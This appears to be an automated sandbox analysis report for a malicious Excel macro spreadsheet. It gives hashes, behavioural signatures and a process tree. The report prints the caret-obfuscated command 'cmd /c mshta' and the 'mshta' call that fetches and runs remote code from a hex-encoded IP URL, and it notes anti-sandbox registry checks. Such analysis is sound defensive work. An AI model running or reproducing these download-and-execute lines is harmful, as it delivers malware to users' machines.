Analysis
-
max time kernel
151s -
max time network
131s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
19-01-2022 10:02
Behavioral task
behavioral1
Sample
bedfbe47fbde08c3b2471c10061982611d471e5feae913cb7f91e63003a1a5cc.xlsm
Resource
win10-en-20211208
General
-
Target
bedfbe47fbde08c3b2471c10061982611d471e5feae913cb7f91e63003a1a5cc.xlsm
-
Size
114KB
-
MD5
254ffcdec7238f1444fe24932ce54457
-
SHA1
f279f9375c94edc055cb29d3d511c2b984eea05a
-
SHA256
bedfbe47fbde08c3b2471c10061982611d471e5feae913cb7f91e63003a1a5cc
-
SHA512
559fa4d2a1cb30817e0560c676f077884299dd3ec4a8d1955e7058a63c0e2d4e723c76f68b940353163f45d737d0023128c37cd4be26b2728fd71e0981af224a
Malware Config
Extracted
http://0x5cff39c3/sec/sec.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 5116 2272 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 52 4500 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2272 EXCEL.EXE -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 2272 EXCEL.EXE 2272 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 20 IoCs
Processes:
EXCEL.EXEpid process 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE 2272 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid process target process PID 2272 wrote to memory of 5116 2272 EXCEL.EXE cmd.exe PID 2272 wrote to memory of 5116 2272 EXCEL.EXE cmd.exe PID 5116 wrote to memory of 4500 5116 cmd.exe mshta.exe PID 5116 wrote to memory of 4500 5116 cmd.exe mshta.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\bedfbe47fbde08c3b2471c10061982611d471e5feae913cb7f91e63003a1a5cc.xlsm"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/sec.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://0x5cff39c3/sec/sec.html3⤵
- Blocklisted process makes network request